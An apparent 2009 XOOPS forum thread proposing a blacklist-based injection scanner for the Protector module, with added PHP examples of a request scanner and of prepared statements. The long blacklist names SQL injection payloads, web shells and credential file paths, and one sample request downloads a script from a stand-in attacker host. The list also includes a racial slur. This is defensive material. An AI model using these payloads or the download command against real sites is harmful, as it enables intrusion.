PEAK XOOPS - injection scanner

injection scanner

Posted on 2009/3/2 14:04
onasre  Posts: 38
Hello

Just another idea I was thinking about: Protector could have a file, let's call it scanner.php, whose job is to search for any exploit command and ban or log the IP of whoever tried to exploit the page. For example, when someone calls a page like this: http://xoops/modules/news/index.php?cmd=

since cmd= is an SQL injection exploit.

Now, after we have created scanner.php, we need to include it in the mainfile; then we need to create a list of well-known exploit character strings used for remote execution exploits.

And here are some..

chr(
chr=
chr%20
%20chr
wget%20
%20wget
wget(
cmd=
%20cmd
cmd%20
rush=
%20rush
rush%20
union%20
%20union
union(
union=
echr(
%20echr
echr%20
echr=
esystem(
esystem%20
cp%20
%20cp
cp(
mdir%20
%20mdir
mdir(
mcd%20
mrd%20
rm%20
%20mcd
%20mrd
%20rm
mcd(
mrd(
rm(
mcd=
mrd=
mv%20
rmdir%20
mv(
rmdir(
chmod(
chmod%20
%20chmod
chmod(
chmod=
chown%20
chgrp%20
chown(
chgrp(
locate%20
grep%20
locate(
grep(
diff%20
kill%20
kill(
killall
passwd%20
%20passwd
passwd(
telnet%20
vi(
vi%20
insert%20into
select%20
nigga(
%20nigga
nigga%20
fopen
fwrite
%20like
like%20
_REQUEST
_GET
$REQUEST
$GET
.system
HTTP_PHP
&aim
%20getenv
getenv%20
new_password
&icq
/etc/password
/etc/shadow
/etc/groups
/etc/gshadow
HTTP_USER_AGENT
HTTP_HOST
/bin/ps
wget%20
uname\x20-a
/usr/bin/id
/bin/echo
/bin/kill
/bin/
/sbin/
/usr/sbin
/chgrp
/chown
/usr/bin
g\+\+
bin/python
bin/tclsh
bin/nasm
perl%20
traceroute%20
ping%20
.pl
/usr/X11R6/bin/xterm
lsof%20
/bin/mail
.conf
motd%20
HTTP/1.
.inc.php
config.php
cgi-
.eml
file\://
file://
window.open
javascript\://
javascript://
img src
img%20src
.jsp
ftp.exe
xp_enumdsn
xp_availablemedia
xp_filelist
xp_cmdshell
nc.exe
.htpasswd
servlet
/etc/passwd
wwwacl
~root
~ftp
.js
.jsp
admin_
.history
bash_history
.bash_history
~nobody
server-info
server-status
reboot%20
halt%20
powerdown%20
/home/ftp
/home/www
secure_site, ok
chunked
org.apache
/servlet/con
<script
/robot.txt
/robots.txt
/perl
mod_gzip_status
db_mysql.inc
.inc
select%20from
select from
drop%20
.system
getenv
http_
_php
php_
phpinfo()
<?php
?>
sql=
%2527
<br
cc:
bcc:
\r
\n
admin'--
'%20or%200=0%20--
"%20or%200=0%20--
or%200=0%20--
'%20or%200=0%20#
"%20or%200=0%20#
or%200=0%20#
'%20or%20'x'='x
"%20or%20"x"="x
')%20or%20('x'='x
'%20or%201=1--
"%20or%201=1--
or%201=1--
'%20or%20a=a--
"%20or%20"a"="a
')%20or%20('a'='a
")%20or%20("a"="a
hi"%20or%20"a"="a
hi"%20or%201=1%20--
hi'%20or%201=1%20--
hi'%20or%20'a'='a
hi')%20or%20('a'='a
hi")%20or%20("a"="a
c99shell
r57shell
crystalshell
phpshell
dtool
fetch%20
curl%20
lynx%20
ls%20-
/var/tmp
cd%20
_SERVER
$SERVER
_POST
$POST
rundll32
PHP_SELF
<iframe
<script
<a href
<javascript
alert(
<img
<embed
<object
%20src
%3b
%2f
%3f
%3a
%40
%3d
%26
%3c
%3e
%22
%23
%7b
%7d
%7c
%5c
%5e
%7e
%5b
%5d
%60
%25
%27
\x3b
\x2f
\x3f
\x3a
\x40
\x3d
\x26
\x3c
\x3e
\x22
\x23
\x7b
\x7d
\x7c
\x5c
\x5e
\x7e
\x5b
\x5d
\x60
\x25
\x27


Just another idea..
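As an added illustration of the scanner.php idea in the post above (this is not Protector or XOOPS code, and the pattern subset, the log path and the sample request are all assumptions made for the example), here is a minimal request scanner in PHP 7.1+ that normalises each request value, matches it against a blacklist, and logs the hit:

```php
<?php
declare(strict_types=1);
// Added example (not Protector or XOOPS code): a minimal request scanner
// in the spirit of the scanner.php proposed above. The pattern list, the
// log path and the sample request are illustrative assumptions.

// A small, hypothetical subset of the blacklist from the post. Entries are
// stored already decoded and lower-cased, because the input is normalised
// the same way before matching (so "union%20select", "UNION  SELECT" and
// "union select" all hit the one entry).
const SCANNER_PATTERNS = [
    'union select',
    'or 1=1',
    'xp_cmdshell',
    '/etc/passwd',
    '<script',
    'wget ',
    'curl ',
    'c99shell',
    'r57shell',
];

/**
 * Normalise one request value before matching.
 *
 * PHP has already URL-decoded $_GET/$_POST once; decoding twice more
 * collapses double encoding (%2527 -> %27 -> ') that is meant to slip past
 * a single-pass filter. Whitespace runs are collapsed and case is folded.
 */
function scanner_normalise(string $value): string
{
    $decoded = rawurldecode(rawurldecode($value));
    $decoded = preg_replace('/\s+/', ' ', $decoded) ?? $decoded;
    return strtolower($decoded);
}

/**
 * Walk a (possibly nested, e.g. ?a[]=x&a[]=y) request array and return the
 * first match as ['param' => 'get.cmd', 'pattern' => 'wget '], or null.
 */
function scanner_find_hit($input, array $patterns, string $path = ''): ?array
{
    if (is_array($input)) {
        foreach ($input as $key => $item) {
            $child = $path === '' ? (string) $key : $path . '.' . $key;
            $hit = scanner_find_hit($item, $patterns, $child);
            if ($hit !== null) {
                return $hit;
            }
        }
        return null;
    }
    $norm = scanner_normalise((string) $input);
    foreach ($patterns as $pattern) {
        if (strpos($norm, $pattern) !== false) {
            return ['param' => $path, 'pattern' => $pattern];
        }
    }
    return null;
}

/**
 * Append one line to the log. Only REMOTE_ADDR should be used for the IP:
 * X-Forwarded-For is client-supplied and can be forged, so banning on it
 * would let an attacker get somebody else blocked. CR/LF are stripped from
 * the URI so a request cannot forge extra log lines.
 */
function scanner_log(string $logfile, string $ip, string $uri, array $hit): void
{
    $uri  = str_replace(["\r", "\n"], ' ', $uri);
    $line = sprintf("%s ip=%s uri=%s param=%s pattern=%s\n",
        gmdate('Y-m-d\TH:i:s\Z'), $ip, $uri, $hit['param'], $hit['pattern']);
    file_put_contents($logfile, $line, FILE_APPEND | LOCK_EX);
}

// Constructed sample request (not captured traffic): the URL from the post
// above, with a download command in cmd= and a tautology probe in storyid=.
$request = [
    'get'  => ['cmd' => 'wget http://attacker.example/x.sh', 'storyid' => "1' OR 1=1--"],
    'post' => [],
];
$hit = scanner_find_hit($request, SCANNER_PATTERNS);
if ($hit !== null) {
    scanner_log(sys_get_temp_dir() . '/scanner.log', '203.0.113.5',
        '/modules/news/index.php?cmd=', $hit);
    // In mainfile.php this is where the request would be refused:
    // http_response_code(403); exit;
}
echo $hit === null ? "clean\n" : "blocked on {$hit['param']} ({$hit['pattern']})\n";
```

Two things to keep in mind if you wire something like this into mainfile.php: list entries such as `select%20`, `%20like` or `cmd=` will also match legitimate content (a news article posted via POST that contains the words "select" or "like"), so a block-on-match policy needs a way to review and whitelist false positives; and a substring blacklist is bypassed by anything it did not anticipate (inline comments like `union/**/select`, alternative encodings, keywords split across parameters), which is the limitation the replies below point out.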
Posted on 2009/3/18 19:39
Mikhail  From: Rio de Janeiro, Brasil  Posts: 15
Excellent idea. You can update your list by looking at the source code of the latest cracker scanners and at your web logs. I love doing that.

PS1: a lot of web scanners created by "genial" script kiddiez and designed to attack can also be used to discover and fix potential security holes, but professional developers and webmasters rarely do that (AFAIK).

PS2: (maybe off-topic) I'm trying to code a new security scanner application (Win32/Lua) called "Pandora's Cube" that tests all XOOPS files and uses all ~4,000 variables extracted from XOOPS Cube using PHPXREF 0.7. The objective is to make a more specific tool to help find some kinds of vulnerabilities in XOOPS Cube.
Posted on 2009/4/3 12:50
GIJOE  Posts: 4110
hi onasre.

I also think it's an interesting idea.

But the "blacklisting" method can protect the site only from script kiddies or worms.
It will never be a high hurdle for skilled crackers.

I believe DBLayer-Anti-SQL-Injection is the ultimate method for protecting against SQL injection.

Now I just want all core developers to adopt my overridable databasefactory.php
Posted on 2009/4/5 1:03
vaughan  Posts: 37
Interesting, I think too, but then you will have to keep updating the list when new methods are found.

Personally I think the whitelist approach is best of all: only allow what you want to allow, and prevent anything else.

Gijoe's approach with this new DB layer is excellent IMO.

I was also looking into a DB layer for ICMS, with the idea of better filtering and making better use of mysql_real_escape_string() instead of having addslashes()/stripslashes() all over the place, as well as SQL prepared statements instead of the current methods, and other filters such as PHP 5's native filter_var() and filter_input() etc.
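To make concrete the contrast drawn in the two replies above (a blacklist stops only script kiddies; a whitelist plus prepared statements stops the class of attack), here is an added example, not XOOPS, ImpressCMS or Protector code, of the same story lookup written three ways. An in-memory SQLite table (pdo_sqlite is assumed to be available) stands in for the MySQL news table, and the rows and the probe value are constructed for the illustration:

```php
<?php
declare(strict_types=1);
// Added example (not XOOPS, ImpressCMS or Protector code): one story lookup
// written the three ways discussed above. An in-memory SQLite table stands
// in for the MySQL news table; rows and probe value are constructed.

function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE news (storyid INTEGER PRIMARY KEY, title TEXT, published INTEGER)');
    $db->exec("INSERT INTO news VALUES (1, 'Public story', 1), (2, 'Unpublished draft', 0)");
    return $db;
}

// 1. String building. addslashes()/mysql_real_escape_string() only escape
//    quote characters; a numeric column is compared without quotes, so a
//    value like "1 OR 1=1" passes through untouched and becomes SQL.
//    AND binds tighter than OR, so the WHERE clause is parsed as
//    (published = 1 AND storyid = 1) OR 1=1.
function fetch_concat(PDO $db, string $storyid): array
{
    $sql = 'SELECT storyid, title FROM news WHERE published = 1 AND storyid = ' . addslashes($storyid);
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// 2. Whitelist validation: a story id is a positive integer and nothing
//    else. filter_var() returns false for anything that is not one, so the
//    probe never reaches the database at all.
function validate_storyid($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// 3. Prepared statement: the value is bound as a parameter and is never
//    part of the SQL text, whatever it contains.
function fetch_prepared(PDO $db, int $storyid): array
{
    $stmt = $db->prepare('SELECT storyid, title FROM news WHERE published = 1 AND storyid = :id');
    $stmt->bindValue(':id', $storyid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db    = make_db();
$probe = '1 OR 1=1'; // constructed, of the "or%201=1" kind in the list above

$leaked = fetch_concat($db, $probe);
$id     = validate_storyid($probe);
$safe   = $id === null ? [] : fetch_prepared($db, $id);

printf("concatenation returned %d row(s), whitelist + prepared statement returned %d row(s)\n",
    count($leaked), count($safe));
```

Run as written, the concatenated query returns both rows, the unpublished draft included, while the validated path returns nothing because the probe is rejected before any SQL is built; had a valid id been supplied, the bound parameter would have matched exactly one row. Note that bound parameters cover values only: table and column names or an ORDER BY direction taken from the request still need a whitelist of their own.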
Posted on 2009/4/11 18:08
GIJOE  Posts: 4110
hi vaughan.

I'm waiting for ImpressCMS to adopt my databasefactory.php so that the DBLayer-Anti-SQL-Injection of Protector 3.3 can work.

It must be a killer feature for securing a CMS.
Posted on 2009/4/12 9:29
vaughan  Posts: 37
hi Gijoe,

ImpressCMS 1.1.2 final includes your databasefactory.php modifications, so the patch file you include is not required for 1.1.2 final :)
Posted on 2009/4/12 17:58
GIJOE  Posts: 4110
hi vaughan.

Quote:

ImpressCMS 1.1.2 final includes your databasefactory.php modifications, so the patch file you include is not required for 1.1.2 final :)

Oh!
It's my negligence.
I have to check ImpressCMS 1.1.2 and fix Protector's package and documentation.

Anyway, thank you for the adoption.
This is another proof that ImpressCMS is a security-conscious CMS.
Posted on 2009/4/30 13:58
onasre  Posts: 38
Glad you liked the idea..

By the way Gijoe, are you going to do something about high-load hits or server load? It was an idea from someone, I forgot who it was..
Posted on 2009/5/3 6:32
GIJOE  Posts: 4110
hi onasre.

Quote:

By the way Gijoe, are you going to do something about high-load hits or server load? It was an idea from someone, I forgot who it was..

You can find
precommon_bwlimit_errorlog.php
precommon_bwlimit_message.php
in TRUST/modules/protector/filters_disabled.

I cannot guarantee it is always useful for highly loaded sites.
I can say that Apache modules like mod_bandwidth might be better options if you can use them.
